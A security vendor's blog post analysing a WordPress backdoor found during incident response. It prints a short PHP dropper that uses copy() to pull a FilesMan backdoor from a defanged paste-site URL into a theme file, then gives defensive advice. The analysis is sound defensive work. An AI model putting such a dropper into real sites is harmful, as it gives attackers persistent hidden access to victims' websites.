• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Backdoor using a paste site to host payload

Backdoor Uses Paste Site to Host Payload

September 18, 2018Bruno ZanelatoEspanolPortugues

FacebookTwitterSubscribe

Finding backdoors is one of the biggest challenges of a website security analyst, as backdoors are designed to be hidden in case the malware is found and removed.

Website Backdoors

A backdoor is a piece of malware that attackers leave behind to allow them access back into a website. Hackers like to inject code into different locations to increase their chances of retaining control of the website so they can reinfect it continuously.

Over the year, we have been talking a lot about new ways to decode complex malware that involve usual PHP functions like:

  • eval,
  • create_function,
  • preg_replace,
  • assert,
  • base64_decode.

According to our latest website hacked report, over the course of the previous year:

71% of all compromises had a PHP-based backdoor hidden within the site.

The effectiveness of these backdoors comes from their elusiveness to most website scanning technologies.

We have written many posts on backdoors and their effects. Today, we want to discuss some techniques that don’t follow any obfuscation tricks like encrypted strings, concatenations, and typecasting.

Unusual Backdoors

These unusual backdoors often look like legitimate code and can go unnoticed by most malware scanners available in the market.

However, during an incident response investigation, we detected an interesting backdoor that was small, simple and effective.

The backdoor content uploaded the wp-content/themes/buildup/db.php file and looked like this:

<?php
if ( @copy('hxxps://paste[.]ee/r/3TwsC/0', 'db.php') ) {
echo "Copy_success";
}else{
echo "Copy_failed";
}
?>

This small piece of code downloads the full malware from the hxxps://paste[.].ee website (if you are not familiar with this site, it’s like a Pastebin with SSL and fewer controls).

A free tool obfuscated the downloaded code, which is pretty common for malware developers to find. Additionally, we also see legitimate code using it too.

Obfuscated code that downloads malware from a website
Obfuscated code that downloads malware from a website

Note to devs: Avoid using free tools because they may be saving your code.

And here’s the more “readable” code:

Code that downloads malware from a website
Code that downloads malware from a website

And, as you may have noticed, this is a copy of the FilesMan backdoor which is often hidden in the filesystem making it hard to be found without access to the server or logs. A file is downloading the backdoor. An untrained eye may overlook this.

How to Avoid Website Backdoors

Backdoors can be very hard to find and even harder to get rid of. To begin, it is highly advisable that you monitor your logs constantly for unexpected behavior.

In order to prevent the website from getting infected in the first place, we highly recommend implementing security measures like file integrity monitoring and a Website Application Firewall (WAF).

If you suspect that your website is infected with a backdoor, we have an experienced website security team that can clean up your website. If you are a looking for a DIY solution, we have written a guide explaining How to Clean a Hacked Website.

FacebookTwitterSubscribe

Categories: Website Malware Infections, Website Security, WordPress SecurityTags: Black Hat Tactics, Website Backdoor, WordPress Plugins and Themes

About Bruno Zanelato

Bruno Zanelato is Sucuri's Copywriter who joined the company in 2014. As Eng - System III and working for the SOC team since 2019, his main responsibilities are (firewalls, IDS, IPS, HIDS, WAF, log management, hardening systems, PCI Compliant, IDS/IPS Signatures, Linux/BSD hardening, including developing content to highlight Sucuri's products and services and to educate the public about website security. Bruno's professional experience covers more than 15 years of deploying/managing Web Application Firewall as well as open-source security software. When Bruno isn't drafting blog posts or writing web pages, you might find him online playing MMO RPG games, watching MMA, and having fun with his kids and family during his free time. Connect with him on Linkedin

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.